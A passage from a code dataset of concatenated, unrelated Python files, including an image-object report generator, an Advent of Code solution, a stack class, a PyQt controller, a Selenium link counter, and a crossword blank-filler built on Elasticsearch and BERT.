coord2 = center_coord + rectangle_size / 2\n\n text_size, _ = cv.getTextSize(text, self.font_face, self.font_scale, self.font_thickness)\n offset = (0, rectangle_size) + ((np.repeat(rectangle_size, 2) - text_size) / 2) * (1, -1)\n\n pt1 = self._parse_point(coord1)\n pt2 = self._parse_point(coord2)\n\n if line_thickness > 0:\n cv.rectangle(image, pt1, pt2, line_color, line_thickness)\n\n cv.rectangle(image, pt1, pt2, fill_color, -1)\n cv.putText(image, text, self._parse_point(coord1 + offset), self.font_face, self.font_scale, text_color,\n self.font_thickness, cv.LINE_AA)\n\n @staticmethod\n def _parse_point(coord):\n return tuple(coord.astype(\"int\"))\n\n\nclass ReportGenerator:\n class PDFReport(fpdf.FPDF, fpdf.HTMLMixin):\n pass\n\n def __init__(self, networkx_graphs, image_filename, dictionary_filename, original_image_filepath,\n color_per_type_filepath, color_per_object_data, mm_per_px=None):\n self.mm_per_px = mm_per_px\n self.networkx_graphs = networkx_graphs\n self.found_objects = self._get_found_objects()\n self.color_per_type_filepath = color_per_type_filepath\n self.original_image_filepath = original_image_filepath\n self.dictionary_filename = dictionary_filename\n self.image_filename = image_filename\n self.info_items = self._get_info_items()\n self.object_numbers_filename = \"object_numbers.png\"\n Image.fromarray(self._draw_object_numbers(color_per_object_data)).save(self.object_numbers_filename)\n self.image_height, self.image_width, _ = color_per_object_data.shape\n\n def _get_found_objects(self):\n return dict(enumerate(self._flatten_list(\n self._flatten_list(nx.get_node_attributes(graph, \"found_objects\").values()) for graph in\n self.networkx_graphs), start=1))\n\n @staticmethod\n def _flatten_list(list_of_lists):\n return [item for sublist in list_of_lists for item in sublist]\n\n def _draw_object_numbers(self, image_data):\n f = 4\n resized_data = cv.resize(image_data, None, fx=f, fy=f)\n text_drawer = TextDrawer(cv.FONT_HERSHEY_SCRIPT_SIMPLEX, 1.0, 1)\n text_drawer.draw_texts(\n resized_data,\n [str(number) for number in self.found_objects.keys()],\n [np.flip(found_object[\"center_coords\"]) * f for found_object in self.found_objects.values()]\n )\n return resized_data\n\n def _generate_pdf_report(self, pdf):\n pdf.add_page()\n pdf.set_font(\"Arial\")\n\n pdf.set_font_size(20)\n pdf.cell(w=0, h=15, ln=1, txt=\"Found Objects\", align=\"L\")\n\n self._write_report_info(pdf)\n self._write_object_count(pdf)\n\n width_mm = pdf.fw - pdf.l_margin - pdf.r_margin\n height_mm = self.image_height * (width_mm / self.image_width)\n\n pdf.set_font_size(8)\n\n pdf.add_page()\n pdf.image(self.original_image_filepath, w=width_mm, h=height_mm)\n pdf.cell(w=0, h=6, ln=1, txt=\"Original Image\", align=\"C\")\n\n pdf.add_page()\n pdf.image(self.color_per_type_filepath, w=width_mm, h=height_mm)\n pdf.cell(w=0, h=6, ln=1, txt=\"Objects by Type\", align=\"C\")\n\n pdf.add_page()\n pdf.image(self.object_numbers_filename, w=width_mm, h=height_mm)\n pdf.cell(w=0, h=6, ln=1, txt=\"Objects by Number\", align=\"C\")\n\n pdf.add_page()\n self._write_object_features(pdf, \"px\")\n pdf.cell(w=0, h=9, ln=1,\n txt=\"1 mm per px = {}\".format(self.mm_per_px if self.mm_per_px is not None else \"(Not available)\"),\n align=\"L\")\n\n if self.mm_per_px is None:\n return\n\n pdf.add_page()\n self._write_object_features(pdf, \"mm\")\n\n def _get_info_items(self):\n return [\n (\"Image file\", self.image_filename),\n (\"Dictionary file\", self.dictionary_filename),\n (\"Report generation date\", datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n ]\n\n def _write_report_info(self, pdf):\n pdf.set_font_size(16)\n pdf.cell(w=0, h=12, ln=1, txt=\"Info\", align=\"L\")\n pdf.set_font_size(12)\n for k, v in self.info_items:\n pdf.cell(w=0, h=9, ln=1, txt=\"{}: {}\".format(k, v), align=\"L\")\n\n def _write_object_count(self, pdf):\n pdf.set_font_size(16)\n pdf.cell(w=0, h=12, ln=1, txt=\"Object Count\", align=\"L\")\n pdf.set_font_size(12)\n count = {object_type: self._count_found_objects(object_type) for object_type in self._get_found_object_types()}\n for k, v in count.items():\n pdf.cell(w=0, h=9, ln=1, txt=\"Objects of type '{}': {}\".format(k, v), align=\"L\")\n pdf.cell(w=0, h=9, ln=1, txt=\"Total objects found: {}\".format(sum(count.values())), align=\"L\")\n\n def _write_object_features(self, pdf, length_unit):\n x = pdf.get_x()\n pdf.set_font_size(16)\n pdf.cell(w=0, h=12, ln=1, txt=\"Object Features ({})\".format(length_unit), align=\"L\")\n pdf.set_font_size(12)\n pdf.set_draw_color(0)\n pdf.write_html(self._repr_object_features(length_unit))\n pdf.set_font(\"Arial\")\n pdf.set_x(x)\n\n def _count_found_objects(self, object_type=None):\n if object_type:\n types = [found_object[\"type\"] for found_object in self.found_objects.values()]\n return types.count(object_type)\n else:\n return sum([g.number_of_nodes() for g in self.networkx_graphs])\n\n def _get_found_object_types(self):\n return set(found_object[\"type\"] for found_object in self.found_objects.values())\n\n def _repr_object_features(self, length_unit):\n length_ratio = self.mm_per_px if length_unit == \"mm\" else 1\n return \"\"\"\n \n \n \n \n \n \n \n \n \n \n \n \n {}\n \n
    TypeLength [{}]Min width [{}]Max width [{}]Max angle [°]
    \n \"\"\".format(length_unit, length_unit, length_unit, \"\\n\".join(\n self._repr_found_object(number, found_object, length_ratio) for number, found_object in\n self.found_objects.items()))\n\n @staticmethod\n def _repr_found_object(number, found_object, length_ratio):\n return \"\"\"\n \n {}\n {}\n {}\n {}\n {}\n {}\n \n \"\"\".format(\n \"#FFFFFF\" if number % 2 == 0 else \"#F0FFF0\",\n number,\n found_object[\"type\"],\n round(found_object[\"length\"] * length_ratio, 1),\n round(found_object[\"min_width\"] * length_ratio, 2),\n round(found_object[\"max_width\"] * length_ratio, 2),\n round(found_object[\"max_angle\"], 1),\n )\n\n def to_pdf(self, filename=None):\n pdf = ReportGenerator.PDFReport()\n self._generate_pdf_report(pdf)\n return pdf.output(dest=\"S\").encode(\"latin-1\") if filename is None else pdf.output(name=filename, dest=\"F\")\n\n def _generate_xlsx_report(self, xlsx):\n formats = {\n \"bold\": xlsx.add_format({\"bold\": True}),\n \"round1\": xlsx.add_format({\"num_format\": \"0.0\"}),\n \"round2\": xlsx.add_format({\"num_format\": \"0.00\"})\n }\n\n start_row = 0\n start_col = 0\n\n info = xlsx.add_worksheet(\"Info\")\n self._write_table(info, start_row - 1, start_col, [], self.info_items, None)\n\n object_count = xlsx.add_worksheet(\"Object Count\")\n count = {object_type: self._count_found_objects(object_type) for object_type in self._get_found_object_types()}\n data_row = self._write_table(\n object_count, start_row, start_col, (\"Type\", \"Count\"), count.items(), formats[\"bold\"]\n )\n number_range = xlsxwriter.utility.xl_range(start_row + 1, start_col + 1, data_row - 1, start_col + 1)\n object_count.write_string(data_row, start_col, \"Total\", formats[\"bold\"])\n object_count.write_formula(data_row, start_col + 1, \"=SUM({})\".format(number_range), value=sum(count.values()))\n\n original_image = xlsx.add_worksheet(\"Original Image\")\n original_image.insert_image(start_row, start_col, self.original_image_filepath)\n\n color_per_type = xlsx.add_worksheet(\"Objects by Type\")\n color_per_type.insert_image(start_row, start_col, self.color_per_type_filepath)\n\n object_numbers = xlsx.add_worksheet(\"Objects by Number\")\n object_numbers.insert_image(start_row, start_col, self.object_numbers_filename)\n\n object_features_columns = (\"Number\", \"Type\", \"Length [{}]\", \"Min width [{}]\", \"Max width [{}]\", \"Max angle [°]\")\n object_features_name = \"Object Features ({})\"\n object_features_column_formats = (\n None, None, formats[\"round1\"], formats[\"round2\"], formats[\"round2\"], formats[\"round1\"]\n )\n\n def _get_object_features(length_ratio):\n return ((number,\n found_object[\"type\"],\n found_object[\"length\"] * length_ratio,\n found_object[\"min_width\"] * length_ratio,\n found_object[\"max_width\"] * length_ratio,\n found_object[\"max_angle\"]) for number, found_object in self.found_objects.items())\n\n object_features_px = xlsx.add_worksheet(object_features_name.format(\"px\"))\n self._write_table(object_features_px, start_row, start_col,\n (column.format(\"px\") for column in object_features_columns),\n _get_object_features(1), formats[\"bold\"], object_features_column_formats)\n\n object_size_ratio = xlsx.add_worksheet(\"Object Size Ratio\")\n object_size_ratio.write_string(start_row, start_col, \"1 mm per px\", formats[\"bold\"])\n object_size_ratio.write(\n start_row + 1, start_col, self.mm_per_px if self.mm_per_px is not None else \"(Not available)\"\n )\n\n if self.mm_per_px is None:\n return\n\n object_features_mm = xlsx.add_worksheet(object_features_name.format(\"mm\"))\n self._write_table(object_features_mm, start_row, start_col,\n (column.format(\"mm\") for column in object_features_columns),\n _get_object_features(self.mm_per_px), formats[\"bold\"], object_features_column_formats)\n\n @staticmethod\n def _write_table(worksheet, start_row, start_col, column_names, table_values, column_names_format,\n column_formats=None):\n for col, column_name in enumerate(column_names):\n worksheet.write_string(start_row, start_col + col, column_name, column_names_format)\n data_row = start_row + 1\n for row_values in table_values:\n for col, cell in enumerate(row_values):\n worksheet.write(\n data_row, start_col + col, cell, None if column_formats is None else column_formats[col]\n )\n data_row += 1\n return data_row\n\n def to_xlsx(self, filename=None):\n output = BytesIO() if filename is None else filename\n xlsx = xlsxwriter.Workbook(output)\n self._generate_xlsx_report(xlsx)\n xlsx.close()\n if filename is None:\n output.seek(0)\n return output.read()\n","repo_name":"jstarzyk/dicom-parser","sub_path":"report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":12700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39950648292","text":"import numpy as np\n\n\ndata = np.loadtxt(\"input\", dtype=int, delimiter=\",\")\ndata = np.array([16,1,2,0,4,2,7,1,2,14])\n\n# Part 1\nprint(int(np.sum(np.abs(data - np.round(np.median(data))))))\n\n\n# Part 2 (Smart)\nprint(np.mean(data) + 0.5)\nx = np.abs(data - np.round(np.mean(data) + 0.5))\nprint(int(np.sum(x * (x+1) / 2)))\n\n# Part 2 (Brute)\nmin_cost = None\nmin_i = None\nfor i in range(np.min(data), np.max(data)):\n x = np.abs(data - i)\n cost = np.sum(x * (x+1) / 2)\n # print(i, cost)\n if min_cost is None or cost < min_cost:\n min_cost = cost\n min_i = i\n \nprint(min_i, int(min_cost))\n \n \n","repo_name":"theevann/advent-of-code","sub_path":"2021/day_7/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5903506672","text":"class Element(object):\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList(object):\n def __init__(self, head=None):\n self.head = head\n\n def insert_first(self, new_element):\n new_element.next = self.head\n self.head = new_element\n\n def delete_first(self):\n if self.head:\n deleted_element = self.head\n temp = deleted_element.next\n self.head = temp\n return deleted_element\n else:\n return None\n\n\nclass Stack(object):\n def __init__(self, top=None):\n self.ll = LinkedList(top)\n\n def push(self, new_element):\n self.ll.insert_first(new_element)\n\n def pop(self):\n return self.ll.delete_first()\n\n\nstack = Stack()\nsequence = \"123456789\"\n\nfor ch in sequence:\n stack.push(Element(ch))\n print(ch,end=\"\")\nprint()\n\ne = stack.pop()\nwhile e:\n print(e.value, end=\"\")\n e = stack.pop()\n","repo_name":"KomissarovSV/Algorithms","sub_path":"Stack/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19373270020","text":"from __future__ import annotations\nimport logging\n\nfrom PyQt5.QtCore import QItemSelection\nfrom PyQt5.QtWidgets import QAbstractItemView\n\nfrom ...api.observer import Observable, Observer\nfrom ...model import DetectorPresenter\nfrom ...model.data import DiffractionDatasetPresenter\nfrom ...model.image import ImagePresenter\nfrom ...model.probe import ApparatusPresenter\nfrom ...view.detector import DetectorView\nfrom ...view.image import ImageView\nfrom ..data import FileDialogFactory\nfrom ..image import ImageController\nfrom .parameters import DetectorParametersController\nfrom .treeModel import DatasetTreeModel, DatasetTreeNode\n\nlogger = logging.getLogger(__name__)\n\n\nclass DetectorController(Observer):\n\n def __init__(self, detectorPresenter: DetectorPresenter,\n apparatusPresenter: ApparatusPresenter,\n datasetPresenter: DiffractionDatasetPresenter, imagePresenter: ImagePresenter,\n view: DetectorView, imageView: ImageView,\n fileDialogFactory: FileDialogFactory) -> None:\n super().__init__()\n self._datasetPresenter = datasetPresenter\n self._imagePresenter = imagePresenter\n self._view = view\n self._imageView = imageView\n self._imageController = ImageController.createInstance(imagePresenter, imageView,\n fileDialogFactory)\n self._parametersController = DetectorParametersController.createInstance(\n detectorPresenter, apparatusPresenter, view.parametersView)\n self._treeModel = DatasetTreeModel()\n\n @classmethod\n def createInstance(cls, detectorPresenter: DetectorPresenter,\n apparatusPresenter: ApparatusPresenter,\n datasetPresenter: DiffractionDatasetPresenter,\n imagePresenter: ImagePresenter, view: DetectorView, imageView: ImageView,\n fileDialogFactory: FileDialogFactory) -> DetectorController:\n controller = cls(detectorPresenter, apparatusPresenter, datasetPresenter, imagePresenter,\n view, imageView, fileDialogFactory)\n\n view.dataView.treeView.setModel(controller._treeModel)\n view.dataView.treeView.setSelectionBehavior(QAbstractItemView.SelectRows)\n view.dataView.treeView.selectionModel().selectionChanged.connect(controller._updateView)\n datasetPresenter.addObserver(controller)\n\n controller._syncModelToView()\n\n return controller\n\n def _updateView(self, selected: QItemSelection, deselected: QItemSelection) -> None:\n for index in deselected.indexes():\n self._imagePresenter.clearArray()\n break\n\n for index in selected.indexes():\n node = index.internalPointer()\n self._imagePresenter.setArray(node.data)\n break\n\n def _syncModelToView(self) -> None:\n rootNode = DatasetTreeNode.createRoot()\n\n for arrayPresenter in self._datasetPresenter:\n rootNode.createChild(arrayPresenter)\n\n self._treeModel.setRootNode(rootNode)\n\n infoText = self._datasetPresenter.getInfoText()\n self._view.dataView.infoLabel.setText(infoText)\n\n def update(self, observable: Observable) -> None:\n if observable is self._datasetPresenter:\n self._syncModelToView()\n","repo_name":"AdvancedPhotonSource/ptychodus","sub_path":"ptychodus/controller/detector/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"36731466195","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\n\ndriver=webdriver.Chrome(r'C:\\Users\\silpa\\PycharmProjects\\chromedriver_win32\\chromedriver')\n\ndriver.get(\"https://www.expedia.co.in/\")\ndriver.maximize_window()\n\ntime.sleep(3)\nlinks=driver.find_elements(By.CLASS_NAME,\"uitk-link uitk-link-layout-inline uitk-type-200\")\nprint(\"Total number of Links present is: \",len(links)) #number of links present\n\nfor link in links:\n print(link.text) #Print all the link names\n\n#clicking the link\n\ndriver.find_element_by_link_text(\"Support\").click()\n#or\n#driver.find_element_by_partial_link_text(\"Supp\").click()\n\ntime.sleep(2)\ndriver.close()\n\n","repo_name":"silpa-priyadarshini/SELENIUM-_PYTHON","sub_path":"sessions/Links.py","file_name":"Links.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37331123600","text":"#Escribir una función que reciba una muestra de números en una lista y devuelva otra lista con sus cuadrados.\n\ndef cuadrados(lista):\n cuadrados=[]\n\n for i in range(len(lista)):\n cuadrados.append(lista[i]** 2)\n return cuadrados\n\n\nlista = [3,4,2,1,24,7,9,20]\nprint(f'La lista de numeros enteros es: {lista}')\nprint (f'Los cuadrados de los numeros son: {cuadrados(lista)}')","repo_name":"ecelis1/programacion2","sub_path":"Actividades/Laboratorio2/GuiaN1/e2.py","file_name":"e2.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75056057651","text":"\nimport numpy as np, os, time, json\nfrom os.path import join, exists\nfrom collections import defaultdict\nfrom elasticsearch import Elasticsearch, helpers\nfrom bert4keras.models import build_transformer_model\nfrom bert4keras.tokenizers import Tokenizer\nfrom bert4keras.snippets import to_array\nfrom .utils import BaseObject\nfrom .puz_utils import tokenize, string2fill, blank as blank_str\n\nclass BlankFiller(BaseObject):\n\t@property\n\tdef options(self): return dict(super().options, **{\n\t\t\"dbname\": \"wiki_titles\",\n\t\t\"src_file_path\": \"/mnt/clh25/wikidata/outputs/wikititles.txt\",\n\t\t\"es_host\": '10.176.64.111:9200',\n\t\t\"new\": False,\n\t\t\"doc_limit\": 20,\n\t\t\"idf_path\": \"data/idf_wikititle.txt\",\n\t})\n\t@property\n\tdef bert_path(self): return \"../bert/wwm_uncased_L-24_H-1024_A-16\"\n\t@property\n\tdef blank(self): return blank_str\n\t@property\n\tdef initializations(self): \n\t\treturn super().initializations + [\n\t\t\tself.init_bert,\n\t\t\tself.init_es,\n\t\t]\n\tdef init_es(self, args, **kwargs):\n\t\tself.es = Elasticsearch(self.es_host)\n\t\tif not self.es.indices.exists(self.dbname) or self.new:\n\t\t\tprint(\"index doesn't exists, creating one\")\n\t\t\tmapping = {\n\t\t\t\t'properties': {\n\t\t\t\t\t'title': {\n\t\t\t\t\t\t'type': 'text',\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tprint(\"Clearing the old db...\")\n\t\t\tprint(self.es.indices.delete(index=self.dbname, ignore=[400, 404]))\n\t\t\tprint(\"Creating the new db...\")\n\t\t\tprint(self.es.indices.create(index=self.dbname, ignore=400))\n\t\t\tprint(\"Specifying the index...\")\n\t\t\tresult = self.es.indices.put_mapping(index=self.dbname, body=mapping)\n\t\t\tprint(result)\n\n\t\t\tdef data_gen(dirn):\n\t\t\t\tcnt = 0\n\t\t\t\tt0 = time.time()\n\t\t\t\twith open(dirn, encoding=\"utf-8\") as fin:\n\t\t\t\t\tfin.readline()\n\t\t\t\t\tfor line in fin:\n\t\t\t\t\t\t_id, remains = line.strip(\"\\r\\n\").split(\"\\t\", 1)\n\t\t\t\t\t\tfor item in remains.split(\"\\t\"):\n\t\t\t\t\t\t\twikipedia_id, remain = item.split(\",\", 1)\n\t\t\t\t\t\t\ttitle, source = remain.rsplit(\",\", 1)\n\t\t\t\t\t\t\tyield {\"_index\": self.dbname, \"_id\": _id, \"_source\": {\n\t\t\t\t\t\t\t\t\"redirect\": int(source), \n\t\t\t\t\t\t\t\t\"title\": title.replace(\"_\", \" \"), \n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\tcnt += 1\n\t\t\t\t\t\tif cnt % 10000 == 0: print(\"%7d\\t%.2f\"%(cnt, time.time()-t0))\n\t\t\t\tprint(\"%7d\\t%.2f\"%(cnt, time.time()-t0))\n\t\t\thelpers.bulk(self.es, (item for item in data_gen(self.src_file_path)), request_timeout=100)\n\tdef init_bert(self, args, **kwargs):\n\t\tconfig_path = join(self.bert_path, 'bert_config.json')\n\t\tcheckpoint_path = join(self.bert_path, 'bert_model.ckpt')\n\t\tdict_path = join(self.bert_path, 'vocab.txt')\n\t\t\n\t\tself.model = build_transformer_model(\n\t\t\tconfig_path=config_path, checkpoint_path=checkpoint_path, with_mlm=True\n\t\t) # 建立模型,加载权重\n\t\tself.tokenizer = Tokenizer(dict_path, do_lower_case=\"uncased\" in self.bert_path) # 建立分词器\n\n\t\ttoken_ids, _ = self.tokenizer.encode(self.blank)\n\t\tself.blank_tokens = token_ids[1:-1]\n\tdef find_blank(self, token_ids): # TODO: KMP (unnecessary)\n\t\ti = 0\n\t\tN = len(self.blank_tokens)\n\t\twhile i < len(token_ids)-N+1:\n\t\t\tmatch = True\n\t\t\tfor j in range(N):\n\t\t\t\tif token_ids[i+j] != self.blank_tokens[j]: \n\t\t\t\t\tmatch = False\n\t\t\t\t\tbreak\n\t\t\tif match: return (i, i+N)\n\t\t\ti += 1\n\t\treturn -1, -1\n\tdef fill_by_bert(self, clue, length, limit=10, max_masked_words=1, blacklist={\"AND\", \"FOR\", \"THE\"}):\n\t\tret = getattr(self, \"bert_buf\", {}).get(clue)\n\t\tif ret is not None: return ret\n\n\t\tif self.blank in clue:\n\t\t\ttoken_ids, segment_ids = self.tokenizer.encode(clue)\n\t\telse:\n\t\t\ttoken_ids, segment_ids = self.tokenizer.encode(clue, self.blank)\n\t\t\n\t\ttokens, segments, mlens = [], [], []\n\t\ts, t = self.find_blank(token_ids)\n\t\tif t < 0: return []\n\t\tfor i in range(1, max_masked_words+1):\n\t\t\ttokens.append(token_ids[:s] + [self.tokenizer._token_dict[\"[MASK]\"]] * i \\\n\t\t\t\t+ token_ids[t:] + [self.tokenizer._token_dict[\"[PAD]\"]] * (max_masked_words-i))\n\t\t\tsegments.append(segment_ids[:s] + segment_ids[s:s+1] * i + segment_ids[t:]\n\t\t\t\t+ segment_ids[-1:] * (max_masked_words-i))\n\t\t\tmlens.append(i)\n\t\t# for token_ids in tokens:\n\t\t# \tprint(self.tokenizer.ids_to_tokens(token_ids))\t\n\t\tprobas = self.model.predict([tokens, segments])\n\t\tpreds = (-probas).argsort(axis=-1)\n\t\t\n\t\twords = {}\n\t\tfor i in range(max_masked_words):\n\t\t\tfor w in preds[i][s+1]:\n\t\t\t\twd = self.tokenizer.id_to_token(w)\n\t\t\t\tfillstring = string2fill(wd)\n\t\t\t\tif len(fillstring) == length and fillstring not in blacklist:\n\t\t\t\t\twords[fillstring] = words.get(fillstring, 0) + float(probas[i][s+1][w])\n\t\t\t\t\tif len(words) >= limit: break\n\t\t\tif len(words) >= limit: break\n\t\tret = [(w, s, \"BERT\") for w, s in words.items()]\n\t\tret.sort(key=lambda x:-x[1])\n\t\tif hasattr(self, \"bert_buf\"): self.bert_buf[clue] = ret\n\t\treturn ret\n\tdef retrieve(self, query, ifrom=0, limit=None):\n\t\tif limit is None: limit = self.doc_limit\n\t\tkey = \"%s: %d\"%(query, ifrom)\n\t\tret = getattr(self, \"wiki_buf\", {}).get(key)\n\t\tif ret is not None: return ret\n\n\t\tresults = self.es.search(index=self.dbname, body={\n\t\t\t\"query\": {\"bool\": {\n\t\t\t\t\"must\": [\n\t\t\t\t\t{\"match\": {\"title\": query}}\n\t\t\t\t],\n\t\t\t\t\"filter\": [\n\t\t\t\t]\n\t\t\t\t# \"must_not\": {\"term\": {\"lengths\": 10}}\n\t\t\t}},\n\t\t\t\"from\": ifrom,\n\t\t\t\"size\": limit,\n\t\t}, request_timeout=100)\n\t\tret = results[\"hits\"][\"hits\"]\n\t\tret.sort(key=lambda x:(-x[\"_score\"], x[\"_source\"][\"redirect\"]))\n\t\tif hasattr(self, \"wiki_buf\"): self.wiki_buf[key] = ret\n\t\treturn ret\n\tdef fill_by_wiki(self, clue, length, limit=10, blacklist=set()):\n\t\tif self.blank not in clue: return []\n\t\t\n\t\ttokens = tokenize(clue)\n\t\texs = blacklist | {string2fill(t) for t in tokens}\n\t\tif self.blank not in tokens: return []\n\t\tbid = tokens.index(self.blank)\n\t\tpre = tokens[bid-1] if bid > 0 else None\n\t\tpost = tokens[bid+1] if bid+1 < len(tokens) else None\n\t\t\n\t\tret = []\n\t\tcnt = 0\n\t\twhile len(ret) < limit and cnt < limit*10:\n\t\t\titems = self.retrieve(clue.replace(self.blank, \"\"), ifrom=cnt)\n\t\t\tfor item in items:\n\t\t\t\ttts = tokenize(item[\"_source\"][\"title\"])\n\t\t\t\tcands = []\n\t\t\t\tfor i in range(len(tts)):\n\t\t\t\t\tfs = string2fill(tts[i])\n\t\t\t\t\tif len(fs) == length and fs not in exs:\n\t\t\t\t\t\t# if (i == 0 or pre == tts[i-1]) and (i+1 == len(tts) or post == tts[i+1]):\n\t\t\t\t\t\t# \tret.append((fs, item[\"_score\"], item[\"_source\"][\"title\"]))\n\t\t\t\t\t\tscore = item[\"_score\"]\n\t\t\t\t\t\tif i > 0 and pre == tts[i-1]: score *= 2\n\t\t\t\t\t\tif i+1 < len(tts) and post == tts[i+1]: score *= 2\n\t\t\t\t\t\tcands.append((fs, score))\n\t\t\t\tif cands:\n\t\t\t\t\tcands.sort(key=lambda x:-x[1])\n\t\t\t\t\tif cands[0][1] > cands[-1][1]:\n\t\t\t\t\t\tcands = cands[:1]\n\t\t\t\t\tfor f, s in cands:\n\t\t\t\t\t\tret.append((f, s, item[\"_source\"][\"title\"]))\n\t\t\t\t\t\texs.add(f)\n\t\t\tcnt += len(items)\n\t\t\tif not items: break\n\t\treturn ret[:limit]\n\tdef generate(self, clue, length, limit=10, blacklist=set()):\n\t\tret = self.fill_by_wiki(clue, length, limit=limit, blacklist=blacklist)\n\t\t# if len(ret) < limit:\n\t\t# \tret += self.fill_by_bert(clue, length, limit-len(ret))\n\t\treturn ret\nclass BlankFillerProb(BlankFiller):\n\t@property\n\tdef params(self): return dict(super().params, **{\n\t\t\"smooth\": 0.1,\n\t\t\"eta\": 0.04\n\t})\n\t@property\n\tdef initializations(self): \n\t\treturn super().initializations + [\n\t\t\tself.init_idf,\n\t\t\tself.init_buf,\n\t\t]\n\tdef init_idf(self, args, **kwargs):\n\t\tself.idf = {}\n\t\twith open(self.idf_path, encoding=\"utf-8\") as fin:\n\t\t\tfor line in fin:\n\t\t\t\tword, f = line.strip().split(\"\\t\")\n\t\t\t\tself.idf[word] = float(f)\n\tdef init_buf(self, args, buf_dir=\"outputs/fillblanks\", **kwargs): \n\t\tbert_buf_file = join(buf_dir, \"bert_buf.json\")\n\t\tif exists(bert_buf_file):\n\t\t\twith open(bert_buf_file, encoding=\"utf-8\") as fin:\n\t\t\t\tself.bert_buf = json.load(fin)\n\t\telse: self.bert_buf = {}\n\t\twiki_buf_file = join(buf_dir, \"wiki_buf.json\")\n\t\tif exists(wiki_buf_file):\n\t\t\twith open(wiki_buf_file, encoding=\"utf-8\") as fin:\n\t\t\t\tself.wiki_buf = json.load(fin)\n\t\telse: self.wiki_buf = {}\n\tdef save_buf(self, buf_dir=\"outputs/fillblanks\"):\n\t\twith open(join(buf_dir, \"bert_buf.json\"), \"w\", encoding=\"utf-8\") as fout:\n\t\t\tjson.dump(self.bert_buf, fout)\n\t\twith open(join(buf_dir, \"wiki_buf.json\"), \"w\", encoding=\"utf-8\") as fout:\n\t\t\tjson.dump(self.wiki_buf, fout)\n\tdef fill_by_wiki(self, clue, length, limit=10, blacklist=set()):\n\t\ttokens = tokenize(clue)\n\t\texs = blacklist | {string2fill(t) for t in tokens}\n\t\ttry: bid = tokens.index(self.blank)\n\t\texcept Exception:\n\t\t\tprint(clue, tokens)\n\t\t\treturn []\n\t\tpre = tokens[bid-1] if bid > 0 else None\n\t\tpost = tokens[bid+1] if bid+1 < len(tokens) else None\n\t\tdenom = int(pre is not None) + int(post is not None)\n\t\tmaxs = sum([self.idf.get(t, self.idf[\"MAX\"]) for t in tokens if t != self.blank])\n\t\t\n\t\tret = []\n\t\tcnt = 0\n\t\twhile len(ret) < limit and cnt < limit*10:\n\t\t\titems = self.retrieve(clue.replace(self.blank, \"\"), ifrom=cnt)\n\t\t\tfor item in items:\n\t\t\t\ttts = tokenize(item[\"_source\"][\"title\"])\n\t\t\t\tcands = []\n\t\t\t\tfor i in range(len(tts)):\n\t\t\t\t\tfs = string2fill(tts[i])\n\t\t\t\t\tif len(fs) == length and fs not in exs:\n\t\t\t\t\t\t# if (i == 0 or pre == tts[i-1]) and (i+1 == len(tts) or post == tts[i+1]):\n\t\t\t\t\t\t# \tret.append((fs, item[\"_score\"], item[\"_source\"][\"title\"]))\n\t\t\t\t\t\tscore = item[\"_score\"]\n\t\t\t\t\t\tif score > maxs: maxs = score\n\t\t\t\t\t\tprob = score / maxs * (\n\t\t\t\t\t\t\t(\n\t\t\t\t\t\t\t\tint(i > 0 and pre == tts[i-1]) + \n\t\t\t\t\t\t\t\tint(i+1 < len(tts) and post == tts[i+1])\n\t\t\t\t\t\t\t) / denom * (1-self.smooth) + self.smooth\n\t\t\t\t\t\t)\n\t\t\t\t\t\tcands.append((fs, prob))\n\t\t\t\t#print(item[\"_source\"], tts, cands)\n\t\t\t\tif cands:\n\t\t\t\t\tcands.sort(key=lambda x:-x[1])\n\t\t\t\t\tif cands[0][1] > cands[-1][1]:\n\t\t\t\t\t\tcands = cands[:1]\n\t\t\t\t\tfor f, s in cands:\n\t\t\t\t\t\tret.append((f, s, item[\"_source\"][\"title\"]))\n\t\t\t\t\t\texs.add(f)\n\t\t\tcnt += len(items)\n\t\t\tif not items: break\n\t\tret.sort(key=lambda x:-x[1])\n\t\treturn ret[:limit]\n\tdef generate(self, clue, length, limit=10, blacklist=set(), eta=None):\n\t\tif self.blank not in clue: return []\n\t\tif eta is None: eta = self.eta\n\t\tcands = defaultdict(float)\n\t\twiki_res = self.fill_by_wiki(clue, length, limit=limit, blacklist=blacklist)\n\t\tss_wiki = sum([s for w, s, c in wiki_res])\n\t\tfor w, s, c in wiki_res:\n\t\t\tcands[w] = s/ss_wiki * (1-eta)\n\t\tif eta:\n\t\t\tbert_res = self.fill_by_bert(clue, length, limit)\n\t\t\tss_bert = sum([s for w, s, c in bert_res])\n\t\t\tfor w, s, c in bert_res:\n\t\t\t\tcands[w] += s/ss_bert * eta\n\t\t\n\t\treturn [(w, s, \"FB\") for w, s in sorted(cands.items(), key=lambda x:-x[1])[:limit]]\n\ndef test_fill(odir=\"outputs/fillblanks\", limit=100, cluefile=\"data/clues_test.txt\"):\n\tif not exists(odir): os.makedirs(odir)\n\tbf = BlankFillerProb()\n\tt = n = 0\n\twith open(cluefile, encoding=\"utf-8\") as fin, \\\n\topen(join(odir, \"wiki_fill_res.txt\"), \"w\", encoding=\"utf-8\") as fout:\n\t\tfor line in fin:\n\t\t\tdate, clue, ans = line.strip(\"\\r\\n\").split(\"\\t\")\n\t\t\tindex, clue = clue.split(\".\", 1)\n\t\t\tif \"___\" in clue:\n\t\t\t\tn += 1\n\t\t\t\tret = bf.generate(clue, 